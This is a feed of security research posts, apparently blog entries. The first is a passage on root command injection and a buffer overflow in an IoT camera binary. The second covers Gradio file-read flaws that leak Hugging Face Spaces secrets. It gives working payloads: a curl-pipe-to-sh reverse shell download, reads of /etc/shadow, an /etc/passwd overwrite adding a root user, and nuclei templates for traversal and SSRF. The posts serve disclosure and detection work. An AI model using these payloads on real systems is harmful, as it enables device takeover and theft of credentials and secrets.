with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((HOST, PORT))
    s.sendall(b"AgtxCrossPlatCommn14ifconfig@")
    data = s.recv(1024)
    print("RX:", data.decode('utf-8'))
    s.close()

No data was written back to the socket, but on emulated device we saw that the command was executed:

/system/bin # ./unicorn 
eth0      Link encap:Ethernet  HWaddr 52:54:00:12:34:56  
          inet addr:192.168.100.2  Bcast:192.168.100.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:5849 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4680 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:6133675 (5.8 MiB)  TX bytes:482775 (471.4 KiB)
          Interrupt:47 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

Note that the difference in the IP is due to the device being emulated utilizing EMUX (https://emux.exploitlab.net/). One of the commands that is “allowed” per this case is sh, which means we can actually run any command on the system and not just ones listed. For example, the following payload could be used to download and execute a reverse shell on the device:

AgtxCrossPlatCommn14 sh -c 'curl 192.168.55.1/shell.sh | sh'@

Even if this case didn’t allow for the execution of sh, commands could still be chained together and executed with a payload like AgtxCrossPlatCommn14echo hello;id;ls -l@.

/system/bin # ./unicorn                                                                             
hello                                                                                               
uid=0(root) gid=0(root) groups=0(root),10(wheel)                                                    
-rwxr-xr-x    1 dbus     dbus          3774 Apr  9 20:33 actl
-rwxr-xr-x    1 dbus     dbus          2458 Apr  9 20:33 adc_read    
-rwxr-xr-x    1 dbus     dbus       1868721 Apr  9 20:33 av_main   
-rwxr-xr-x    1 dbus     dbus          5930 Apr  9 20:33 burn_in
-rwxr-xr-x    1 dbus     dbus        451901 Apr  9 20:33 cmdsender
-rwxr-xr-x    1 dbus     dbus         13166 Apr  9 20:33 cpu      
-rwxr-xr-x    1 dbus     dbus        162993 Apr  9 20:33 csr    
-rwxr-xr-x    1 dbus     dbus          9006 Apr  9 20:33 dbmonitor
-rwxr-xr-x    1 dbus     dbus         13065 Apr  9 20:33 ddr2pgm     
-rwxr-xr-x    1 dbus     dbus          2530 Apr  9 20:33 dump                  
-rwxr-xr-x    1 dbus     dbus          4909 Apr  9 20:33 dump_csr   
...SNIP...

We performed analysis of other areas of the unicorn executable and identified additional command injection and buffer overflow vulnerabilities. Case 2 is used to execute the cmdsender binary on the device, which appears to be a utility to control certain camera related aspects of the device.

  case 2:
    replaceLastByteWithNull((byte *)client_command,0x40,command_length);
    path_buffer[0] = '/';
    path_buffer[1] = 's';
    path_buffer[2] = 'y';
    path_buffer[3] = 's';
    path_buffer[4] = 't';
    path_buffer[5] = 'e';
    path_buffer[6] = 'm';
    path_buffer[7] = '/';
    path_buffer[8] = 'b';
    path_buffer[9] = 'i';
    path_buffer[10] = 'n';
    path_buffer[11] = '/';
    path_buffer[12] = 'c';
    path_buffer[13] = 'm';
    path_buffer[14] = 'd';
    path_buffer[15] = 's';
    path_buffer[16] = 'e';
    path_buffer[17] = 'n';
    path_buffer[18] = 'd';
    path_buffer[19] = 'e';
    path_buffer[20] = 'r';
    path_buffer[21] = ' ';
    path_buffer[22] = '\0';
    memset(large_buffer,0,0x7fe9);
    strcpy(path_buffer + 0x16,client_command);
    run_system_cmd(path_buffer);
    break;

Running the cmdsender binary on the device:

/system/bin # ./cmdsender -h        
[VPLAT] VB init fail.                                                                                                                                                                                    [VPLAT] UTRC init fail.                                                                                                                                                                                  [VPLAT] SR open shared memory fail.                                                                                                                                                                      [VPLAT] SENIF init fail.                                                                                                                                                                                 
[VPLAT] IS init fail.                            
[VPLAT] ISP init fail.                                                                              
[VPLAT] ENC init fail.                                                                                                                                                                                   
[VPLAT] OSD init fail.                                                                              
USAGE:                                                                                                                                                                                                   
        ./cmdsender [Option] [Parameter]                                                                                                                                                                 
                                                                                                                                                                                                         
OPTION:                                           
        '--roi dev_idx path_idx luma_roi.sx luma_roi.sy luma_roi.ex luma_roi.ey awb_roi.sx awb_roi.sy awb_roi.ex awb_roi.ey' Set ROI attributes
        '--pta dev_idx path_idx mode brightness_value contrast_value break_point_value pta_auto.tone[0 ~ MPI_ISO_LUT_ENTRY_NUM-1] pta_manual.curve[0 ~ MPI_PTA_CURVE_ENTRY_NUM-1]' Set PTA attributes
                                                                                                    
        '--dcc dev_idx path_idx gain0 offset0 gain1 offset1 gain2 offset2 gain3 offset3' Set DCC attributes
                                                                                                    
        '--dip dev_idx path_idx is_dip_en is_ae_en is_iso_en is_awb_en is_csm_en is_te_en is_pta_en is_nr_en is_shp_en is_gamma_en is_dpc_en is_dms_en is_me_en' Set DIP attributes
                                                                                                    
        '--lsc dev_idx path_idx origin x_trend_2s y_trend_2s x_curvature y_curvature tilt_2s' Set LSC attributes
                                                                                                                                                                                                                 '--gamma dev_idx path_idx mode' Set GAMMA attributes                                                                                                                                             
                                                                                                    
        '--ae dev_idx path_idx sys_gain_range.min sys_gain_range.max sensor_gain_range.min sensor_gain_range.max isp_gain_range.min isp_gain_range.max frame_rate slow_frame_rate speed black_speed_bias 
interval brightness tolerance gain_thr_up gain_thr_down 
              strategy.mode strategy.strength roi.luma_weight roi.awb_weight delay.black_delay_frame delay.white_delay_frame anti_flicker.enable anti_flicker.frequency anti_flicker.luma_delta fps_mode 
manual.is_valid manual.enable.bit.exp_value manual.enable.bit.inttime
              manual.enable.bit.sensor_gain manual.enable.bit.isp_gain manual.enable.bit.sys_gain manual.exp_value manual.inttime manual.sensor_gain manual.isp_gain manual.sys_gain' Set AE attributes

        '--iso dev_idx path_idx mode iso_auto.effective_iso[0 ~ MPI_ISO_LUT_ENTRY_NUM-1] iso_manual.effective_iso' Set iso attributes

        '--dbc dev_idx path_idx mode dbc_level' Set DBC attributes

The arguments that are intended to be used with the cmdsender command are received and copied directly to the cmdsender path, which is then passed run_system_cmd, which simply runs system() on the given argument. The payload AgtxCrossPlatCommn2 ; id @ causes the id command to be run on the device:

/system/bin # ./unicorn 
[VPLAT] VB init fail.
[VPLAT] UTRC init fail.
[VPLAT] SR open shared memory fail.
[VPLAT] SENIF init fail.
[VPLAT] IS init fail.
[VPLAT] ISP init fail.
[VPLAT] ENC init fail.
[VPLAT] OSD init fail.
executeCmd(): Unknown command item
item: 920495836, direction: 1
printCmd(): Unknown command item
uid=0(root) gid=0(root) groups=0(root),10(wheel)

Case 4 handles sending files from the device to the connecting client, for example to get /etc/shadow from the device, the payload AgtxCrossPlatCommn4/etc/shadow@ can be used.

python3 case_4.py 
b'root:$1$3hkdVSSD$iPawbqSvi5uhb7JIjY.MK0:10933:0:99999:7:::\ndaemon:*:10933:0:99999:7:::\nbin:*:10933:0:99999:7:::\nsys:*:10933:0:99999:7:::\nsync:*:10933:0:99999:7:::\nmail:*:10933:0:99999:7:::\nwww-data:*:10933:0:99999:7:::\noperator:*:10933:0:99999:7:::\nnobody:*:10933:0:99999:7:::\ndbus:*:::::::\nsshd:*:::::::\nsystemd-bus-proxy:*:::::::\nsystemd-journal-gateway:*:::::::\nsystemd-journal-remote:*:::::::\nsystemd-journal-upload:*:::::::\nsystemd-timesync:*:::::::\n'

Case 5 appears to be for receiving files from a client and is also vulnerable to command injection. Although in this instance spaces break execution, which limits what can be run.

  case 5:
    replaceLastByteWithNull((byte *)client_command,0x40,command_length);
    file_size = parse_file_size((byte *)client_command);
    string_length = strlen(client_command);
    filename = get_cmd_data((byte *)client_command,string_length);
    syslog(6,"fSize = %lu\n",file_size);
    syslog(6,"fPath = \'%s\'\n",filename);
    sprintf(system_command_buffer,"%lu",file_size);
    syslog(6,"ret_value: %s\n",system_command_buffer);
    string_length = strlen(system_command_buffer);
    send_data_to_client((int *)client_info,system_command_buffer,string_length);
    operation_result = recieve_file((int)*client_info,(char *)filename,file_size);
    send_response_to_client((int)*client_info,(SSL **)(client_info + 4),operation_result);
    break;

The format of this command is:

AgtxCrossPlatCommn5<FILE> <NUM-BYTES>@

<FILE> is the name of the file to write and <NUM-BYTES> is the number of bytes that will be sent in the subsequent client transmit. The parse_file_size() function looks for the space and attempts to read the following characters as the number of bytes that will be sent. A command with no spaces, such as the id command, can be injected into the <FILE> portion:

AgtxCrossPlatCommn5test.txt;id #@

# Output from device
/system/bin # ./unicorn 
dos2unix: can't open 'test.txt': No such file or directory
uid=0(root) gid=0(root) groups=0(root),10(wheel)
^C

/system/bin # ls -l test.*
----------    1 root     root             0 Apr 18  2024 test.txt;id

This case can also be used to overwrite files. The follow POC changes the first line in /etc/passwd:

import socket

HOST = "192.168.55.128" 
PORT = 6666 

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((HOST, PORT))
    s.sendall(b"AgtxCrossPlatCommn5/etc/passwd 29@")
    print(s.recv(1024))
    s.sendall(b"haxd:x:0:0:root:/root:/bin/sh")
    print(s.recv(1024))
    s.close()
/system/bin # cat /etc/passwd
haxd:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
bin:x:2:2:bin:/bin:/bin/false
sys:x:3:3:sys:/dev:/bin/false
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/false
www-data:x:33:33:www-data:/var/www:/bin/false
operator:x:37:37:Operator:/var:/bin/false
nobody:x:99:99:nobody:/home:/bin/false
dbus:x:1000:1000:DBus messagebus user:/var/run/dbus:/bin/false
sshd:x:1001:1001:SSH drop priv user:/:/bin/false
systemd-bus-proxy:x:1002:1004:Proxy D-Bus messages to/from a bus:/:/bin/false
systemd-journal-gateway:x:1003:1005:Journal Gateway:/var/log/journal:/bin/false
systemd-journal-remote:x:1004:1006:Journal Remote:/var/log/journal/remote:/bin/false
systemd-journal-upload:x:1005:1007:Journal Upload:/:/bin/false
systemd-timesync:x:1006:1008:Network Time Synchronization:/:/bin/false

Case 8 contains a command injection vulnerability. It is used to run the fw_setenv command, but takes user input as an argument and builds the command string which gets passed directly to a system() call.

  case 8:
  /* command injection here
    AgtxCrossPlatCommn8 ; touch /tmp/fw-setenv-cmdinj.txt # @ */
    
    replaceLastByteWithNull((byte *)client_command,0x40,command_length);
    if (*client_command == '\0') {
      command_params = "fw_setenv --script /system/partition";
    }
    else {
      operation_result = FUN_0000ccd8(client_command);
      if (operation_result != 1) {
        operation_result = FUN_0000da18((int *)client_info,client_command);
        if (operation_result != -1) {
          return 0;
        }
        operation_result = -1;
        goto LAB_0000b63c;
      }
      sprintf(system_command_buffer,"fw_setenv %s",client_command);
      command_params = system_command_buffer;
    }
    system_command_status = run_system_cmd(command_params);
    goto LAB_0000b458;

The payload AgtxCrossPlatCommn8;id @ will cause the id command to be executed.

Case 13 contains a buffer overflow vulnerability. The use case case runs cat on a user provided file. If the filename or path is too long, it causes a buffer overflow.

  case 0xd:
    replaceLastByteWithNull((byte *)client_command,0x40,command_length);
    syslog(6,"ACT_cat: |%s| \n",client_command);
    operation_result = execute_cat_cmd((int *)client_info,client_command);
    if (operation_result != -1) {
      return 0;
    }
LAB_0000b63c:
    sprintf(system_command_buffer,"%d",operation_result);
    string_length = strlen(system_command_buffer);
    send_data_to_client((int *)client_info,system_command_buffer,string_length);
    break;
int execute_cat_cmd(int *socket_info,char *file_path)

{
  size_t result_length;
  char cat_command [128];
  char cat_result [256];
  
  memset(cat_result,0,0x100);
  memset(cat_command,0,0x80);
                    /* Buffer overflow here when file_path > 128
                        */
  sprintf(cat_command,"cat %s",file_path);
  FUN_0000cdc4(cat_command,cat_result);
  result_length = strlen(cat_result);
  send_data_to_client(socket_info,cat_result,result_length);
  return 0;
}

Sending a large amount of A’s causes a segfault showing several registers, including the program counter, and the stack are overwritten with A’s. The payload AgtxCrossPlatCommn13 AAAAAAAAAAAAAA…snipped… @ will cause a crash.

Program received signal SIGSEGV, Segmentation fault.
0x41414140 in ?? ()
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$r0  : 0x0       
$r1  : 0x7efe7188  →  0x4100312d ("-1"?)
$r2  : 0x2       
$r3  : 0x0       
$r4  : 0x41414141 ("AAAA"?)
$r5  : 0x41414141 ("AAAA"?)
$r6  : 0x13a0    
$r7  : 0x7efef628  →  0x00000005
$r8  : 0x7efefaea  →  "   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
$r9  : 0x0008d40c  →  0x00000000
$r10 : 0x13a0    
$r11 : 0x41414141 ("AAAA"?)
$r12 : 0x0       
$sp  : 0x7efe7298  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
$lr  : 0x00012de4  →  0xe1a04000
$pc  : 0x41414140 ("@AAA"?)
$cpsr: [negative ZERO CARRY overflow interrupt fast THUMB]
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x7efe7298│+0x0000: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"    ← $sp
0x7efe729c│+0x0004: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x7efe72a0│+0x0008: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x7efe72a4│+0x000c: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x7efe72a8│+0x0010: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x7efe72ac│+0x0014: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x7efe72b0│+0x0018: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x7efe72b4│+0x001c: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:arm:THUMB ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x41414140
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "unicorn", stopped 0x41414140 in ?? (), reason: SIGSEGV
──────────────────────────────────────────────────────────────────────────────────────

The research shows that a misconfiguration in firmware can lead to multiple code execution paths and reducing the remote attack surfaces, especially from developer tools, can greatly reduce the risk to an IoT device. We recommend that manufactures of devices verify that the unicorn binary is not running or enabled as a service. This would mitigate all of the code execution paths described above. If you have any devices utilizing Augentix SoCs that have this binary, we’d love to hear about it.

Exploiting File Read Vulnerabilities in Gradio to Steal Secrets from Hugging Face Spaces

14 June 2024 at 13:05

On Friday, May 31, the AI company Hugging Face disclosed a potential breach where attackers may have gained unauthorized access to secrets stored in their Spaces platform.

This reminded us of a couple of high severity vulnerabilities we disclosed to Hugging Face affecting their Gradio framework last December. When we reported these vulnerabilities, we demonstrated that they could lead to the exfiltration of secrets stored in Spaces.

Hugging Face responded in a timely way to our reports and patched Gradio. However, to our surprise, even though these vulnerabilities have long been patched, these old vulnerabilities were, up until recently, still exploitable on the Spaces platform for apps running with an outdated Gradio version.

This post walks through the vulnerabilities we disclosed and their impact, and our recent effort to work with Hugging Face to harden the Spaces platform after the reported potential breach. We recommend all users of Gradio upgrade to the latest version, whether they are using Gradio in a Hugging Face Space or self-hosting.

Background

Gradio is a popular open-source Python-based web application framework for developing and sharing AI/ML demos. The framework consists of a backend server that hosts a standard set of REST APIs and a library of front-end components that users can plug in to develop their apps. A number of popular AI apps use Gradio such as the Stable Diffusion Web UI and Text Generation Web UI.

Users have several options for sharing Gradio apps: hosting it in a Hugging Face Space; self-hosting; or using the Gradio share feature, which exposes their machine to the Internet using a Gradio-provided proxy URL similar to ngrok.

A Hugging Face Space provides the foundation for hosting an app using Hugging Face’s infrastructure, which runs on Kubernetes. Users use Git to manage their source code and a Space to build, deploy, and host their app. Gradio is not the only way to develop apps – the Spaces platform also supports apps developed using Streamlit. Docker, or static HTML.

Within a Space, users can define secrets, such as Hugging Face tokens or API keys, that can be used by their app. These secrets are accessible to the application as environment variables. This method for secret storage is a step up from storing secrets in source code.

File Read Vulnerabilities in Gradio

Last December we disclosed to Hugging Face a couple of high severity vulnerabilities, CVE-2023-51449 and CVE-2024-1561, that allow attackers to read arbitrary files from a server hosting Gradio, regardless of whether it was self-hosted, shared using the share feature, or hosted in a Hugging Face space. In a Hugging Face space, it was possible for attackers to exploit these vulnerabilities to access secrets stored in environment variables by reading the /proc/self/environ pseudo-file.

CVE-2023-51449

CVE-2023-51449, which affects Gradio versions 4.0 – 4.10, is a path traversal vulnerability in the file endpoint. This endpoint is supposed to only serve files stored within a Gradio temporary directory. However we found that the check for making sure a requested file was contained within the temporary directory was flawed.

The check on line 935 to prevent path traversal doesn’t account for subdirectories inside the temp folder. We found that we could use the upload endpoint to first create a subdirectory within the temp directory, and then traverse out from that subdirectory to read arbitrary files using the ../ or %2e%2e%2f sequence.

To read environment variables, one can request the /proc/self/environ pseudo-file using a HTTP Range header:

Interestingly, CVE-2023-51449 was introduced in version 4.0 as part of a refactor and appears to be a regression of a prior vulnerability CVE-2023-34239. This same exploit was tested to work against Gradio versions prior to 3.33.

Detection

Below is a nuclei template for testing this vulnerability:


id: CVE-2023-51449
info:
  name: CVE-2023-51449
  author: nvn1729
  severity: high
  description: Gradio LFI when auth is not enabled, affects versions 4.0 - 4.10, also works against Gradio < 3.33
  reference:
    - https://github.com/gradio-app/gradio/security/advisories/GHSA-6qm2-wpxq-7qh2
  classification:
    cvss-score: 7.5
    cve-id: CVE-2024-51449
  tags: cve2024, cve, gradio, lfi

http:
  - raw:
      - |
        POST /upload HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311

        -----------------------------250033711231076532771336998311
        Content-Disposition: form-data; name="files";filename="okmijnuhbygv"
        Content-Type: application/octet-stream

        a
        -----------------------------250033711231076532771336998311--

      - |
        GET /file={{download_path}}{{path}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: download_path
        internal: true
        group: 1
        regex:
          - "\\[\"(.+)okmijnuhbygv\"\\]"

    payloads:
      path:
        - ..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
        - ../../../../../../../../../../../../../../../etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
      
      - type: status
        status:
          - 200

Timeline

  • Dec. 17, 2023: Horizon3 reports vulnerability over email to Hugging Face.
  • Dec. 18, 2023: Hugging Face acknowledges report
  • Dec. 20, 2023: GitHub advisory published. Issue fixed in Gradio 4.11. (Note Gradio used this advisory to cover two separate findings, one for the LFI we reported and another for a SSRF reported by another researcher)
  • Dec. 22, 2023: CVE published
  • Dec. 24, 2023: Hugging Face confirms fix over email with commit https://github.com/gradio-app/gradio/issues/6816

CVE-2024-1561

CVE-2024-1561 arises from an input validation flaw in the component_server API endpoint that allows attackers to invoke internal Python backend functions. Depending on the Gradio version, this can lead to reading arbitrary files and accessing arbitrary internal endpoints (full-read SSRF). This affects Gradio versions 3.47 to 4.12. This is notable because the last version of Gradio 3 is 3.50.2, and a number of users haven’t made the transition yet to Gradio 4 because of the major refactor between versions 3 and 4. The vulnerable code:

On line 702, an arbitrary user-specified function is invoked against the specified component object.

For Gradio versions 4.3 – 4.12, the move_resource_to_block_cache function is defined in the base class of all Component classes. This function copies arbitrary files into the Gradio temp folder, making them available for attackers to download using the file endpoint. Just like CVE-2023-51449, this vulnerability can also be used to grab the /proc/self/environ pseudo-file containing environment variables.

In Gradio versions 3.47 – 3.50.2, a similar function called make_temp_copy_if_needed can be invoked on most Component objects.

In addition, in Gradio versions 3.47 to 3.50.2 another function called download_temp_copy_if_needed can be invoked to read the contents of arbitrary HTTP endpoints and store the results into the temp folder for retrieval, resulting in a full-read SSRF.

There are other component-specific functions that can be invoked across different Gradio versions, and their effects vary per component.

Detection

The following nuclei templates can be used to test for CVE-2024-1561.

File read against Gradio 4.3-4.12:


id: CVE-2024-1561-4x
info:
  name: CVE-2024-1561-4x
  author: nvn1729
  severity: high
  description: Gradio LFI when auth is not enabled, this template works for Gradio versions 4.3-4.12
  reference:
    - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
  classification:
    cvss-score: 7.5
    cve-id: CVE-2024-1561
  tags: cve2024, cve, gradio, lfi

http:
  - raw:
      - |
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"component_id": "1", "data": "{{path}}", "fn_name": "move_resource_to_block_cache", "session_hash": "aaaaaa"}

      - |
        GET /file={{download_path}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: download_path
        internal: true
        group: 1
        regex:
          - "\"?([^\"]+)"

    payloads:
      path:
        - c:\\windows\\win.ini
        - /etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
      
      - type: status
        status:
          - 200

File read against Gradio 3.47 – 3.50.2:


id: CVE-2024-1561-3x
info:
  name: CVE-2024-1561-3x
  author: nvn1729
  severity: high
  description: Gradio LFI when auth is not enabled, this version should work for versions 3.47 - 3.50.2
  reference:
    - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
  classification:
    cvss-score: 7.5
    cve-id: CVE-2024-1561
  tags: cve2024, cve, gradio, lfi

http:
  - raw:
      - |
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"component_id": "{{fuzz_component_id}}", "data": "{{path}}", "fn_name": "make_temp_copy_if_needed", "session_hash": "aaaaaa"}

      - |
        GET /file={{download_path}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: download_path
        internal: true
        group: 1
        regex:
          - "\"?([^\"]+)"
    
    attack: clusterbomb
    payloads:
      fuzz_component_id:
        - 1
        - 2
        - 3
        - 4
        - 5
        - 6
        - 7
        - 8
        - 9
        - 10
        - 11
        - 12
        - 13
        - 14
        - 15
        - 16
        - 17
        - 18
        - 19
        - 20
      path:
        - c:\\windows\\win.ini
        - /etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
      
      - type: status
        status:
          - 200

Exploiting the SSRF against Gradio 3.47-3.50.2:


id: CVE-2024-1561-3x-ssrf
info:
  name: CVE-2024-1561-3x-ssrf
  author: nvn1729
  severity: high
  description: Gradio Full Read SSRF when auth is not enabled, this version should work for versions 3.47 - 3.50.2
  reference:
    - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
  classification:
    cvss-score: 7.5
    cve-id: CVE-2024-1561
  tags: cve2024, cve, gradio, lfi

http:
  - raw:
      - |
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"component_id": "{{fuzz_component_id}}", "data": "http://{{interactsh-url}}", "fn_name": "download_temp_copy_if_needed", "session_hash": "aaaaaa"}

      - |
        GET /file={{download_path}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: download_path
        internal: true
        group: 1
        regex:
          - "\"?([^\"]+)"
    
    payloads:
      fuzz_component_id:
        - 1
        - 2
        - 3
        - 4
        - 5
        - 6
        - 7
        - 8
        - 9
        - 10
        - 11
        - 12
        - 13
        - 14
        - 15
        - 16
        - 17
        - 18
        - 19
        - 20

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        part: body
        regex:
          - <html><head></head><body>[a-z0-9]+</body></html>

Timeline

If you look up CVE-2024-1561 in NVD or MITRE, you’ll see that it was filed by the Huntr CNA and credited to another security researcher on the Huntr platform. In fact, that Huntr report was filed after our original report to Hugging Face, and after the vulnerability was already patched in the mainline. Due to various delays in getting a CVE assigned, Huntr assigned a CVE for this issue prior to us getting a CVE. Here is the actual timeline:

  • Dec. 20, 2023: Horizon3 reports vulnerability over email to Hugging Face.
  • Dec. 24, 2023: Hugging Face acknowledges report
  • Dec. 27, 2023: Fix merged to mainline with commit https://github.com/gradio-app/gradio/pull/6884
  • Dec. 28, 2023: Huntr researcher reports same issue on the Huntr platform here https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
  • Jan 3, 2024: Hugging Face confirms to Horizon3 over email that the vulnerability is fixed with commit https://github.com/gradio-app/gradio/pull/6884 in version 4.13
  • Feb. 2024: Huntr gets confirmation from Gradio this issue is already fixed. Huntr may not have realized it was fixed prior to the report to them.
  • Mar. 17, 2024: Horizon3 checks with Gradio on filing a CVE
  • Mar. 23, 2024: Horizon3 files CVE request with MITRE
  • Apr. 15, 2024: Huntr published CVE-2024-1561
  • May 5, 2024: After multiple follow ups, MITRE assigns CVE-2024-34511 to this vulnerability
  • May 10, 2024: We ask MITRE to reject CVE-2024-34511 as a duplicate after realizing Huntr already had a CVE assigned.

Leaking Secrets in Hugging Face Spaces

As demonstrated above, both vulnerabilities CVE-2023-51449 and CVE-2024-1561 can be used to read arbitrary files from a server hosting Gradio. This includes the /proc/self/environ file on Linux systems containing environment variables. At the time of disclosing these vulnerabilities to Hugging Face, we set up a Hugging Face Space at https://huggingface.co/spaces/nvn1729/hello-world and showed that these vulnerabilities could be exploited to leak secrets configured for the Space. Below is an example of what the environment variable output looks like (with some data redacted). The user configured secrets and variables are shown in bold.


PATH=REDACTED^@HOSTNAME=REDACTED@GRADIO_THEME=huggingface^@TQDM_POSITION=-1^@TQDM_MININTERVAL=1^@SYSTEM=spaces^@SPACE_AUTHOR_NAME=nvn1729^@SPACE_ID=nvn1729/hello-world^@SPACE_SUBDOMAIN=nvn1729-hello-world^@CPU_CORES=2^@mysecret=mysecretvalue^@MEMORY=16Gi^@SPACE_HOST=nvn1729-hello-world.hf.space^@SPACE_REPO_NAME=hello-world^@SPACE_TITLE=Hello World^@myvariable=variablevalue^^@REDACTED

When we heard of the potential breach from Hugging Face on Friday, May 31, we were curious if it was possible that these old vulnerabilities were still exploitable on the Spaces platform. We started up the Space and were surprised to find that it was still running the same vulnerable Gradio version, 4.10, from December.

And the vulnerabilities we had reported were still exploitable. We then the checked the Gradio versions for other Spaces and found that a substantial portion were out of date, and therefore potentially vulnerable to exfiltration of secrets.

It turns out that the Gradio version used by an app is generally fixed at the time a user develops and publishes an app to a Space. A file called README.md controls the Gradio version in use (3.50.2 in this example). It’s up to users to manually update their Gradio version.

We reported the issue to Hugging Face and highlighted that old Gradio Spaces could be exploited by bad actors to steal secrets. Hugging Face responded promptly and implemented measures over the course of a week to harden the Spaces environment:

Hugging Face configured new rules in their “web application firewall” to neutralize exploitation of CVE-2023-51449, CVE-2024-1561, and other file read vulnerabilities reported by other researchers (CVE-2023-34239, CVE-2024-4941, CVE-2024-1728, CVE-2024-0964) that could be used to leak secrets. We iteratively tested different methods for exploiting all of these vulnerabilities and provided feedback to Hugging Face that was incorporated to harden the WAF.

Hugging Face sent out email notifications to users of Gradio Spaces recommending that users upgrade to the latest version.

Along with e-mail notifications, Hugging Face updated their Spaces user interface to highlight if a Space is running an old Gradio version.

Timeline

  • Dec. 18, 2023: We set up a test Space running Gradio 4.10 and demonstrate leakage of Space secrets as part of reporting CVE-2023-51449 and CVE-2024-1561
  • May 31, 2024: Hugging Face discloses potential breach
  • June 2, 2024: We revive the test Space and confirm it’s still running Gradio 4.10 and can be exploited to leak Space secrets. We verify there exist other Spaces running old versions.  We report this to Hugging Face.
  • June 3 – 9, 2024: Hugging Face updates their WAF based on our feedback to prevent exploitation of Gradio vulnerabilities that can lead to leakage of secrets.
  • June 7, 2024: Hugging Face sends out emails to users running outdated versions of Gradio, and rolls out an update to their user interface recommending that users upgrade.

We appreciate Hugging Face’s prompt response in improving their security posture.

Recommendations

In Hugging Face’s breach advisory, they noted that they proactively revoked some Hugging Face tokens that were stored as secrets in Spaces, and that users should refresh any keys or tokens as well. In this post, we’ve shown that old vulnerabilities in Gradio can still be exploited to leak Spaces secrets, and even if they are rotated, an attacker can still get access to them. Therefore, in addition to rotating secrets, we recommend users double check if they are running an outdated Gradio version and upgrade to the latest version if required.

To be clear: We have no idea whether this method of exploiting Gradio led to secrets being leaked in the first place, but the path we’ve shown in this post was available to attackers up til recently.

To upgrade a Gradio Space, a user can visit the README.md file in their Space and click “Upgrade”, as shown below:

Alternatively, users could stop storing secrets in their Gradio Space or enable authentication for their Gradio Space.

While Hugging Face did harden their WAF to neutralize exploitation, we caution users from thinking that this will truly protect them. At best, it’ll prevent exploitation by script kiddies using off-the-shelf POCs. It’s only a matter of time before bypasses are discovered.

Finally for users of Gradio that are exposing it to the Internet using a Gradio share URL or self-hosting, we recommend enabling authentication and also ensuring it’s updated to the latest version.

Sign up for a free trial and quickly verify you’re not exploitable.

Start Your Free Trial

The post Exploiting File Read Vulnerabilities in Gradio to Steal Secrets from Hugging Face Spaces appeared first on Horizon3.ai.

Announcing the Burp Suite Professional chapter in the Testing Handbook

14 June 2024 at 13:00

By Maciej Domanski

Based on our security auditing experience, we’ve found that Burp Suite Professional’s dynamic analysis can uncover vulnerabilities hidden amidst the maze of various target components. Unpredictable security issues like race conditions are often elusive when examining source code alone.

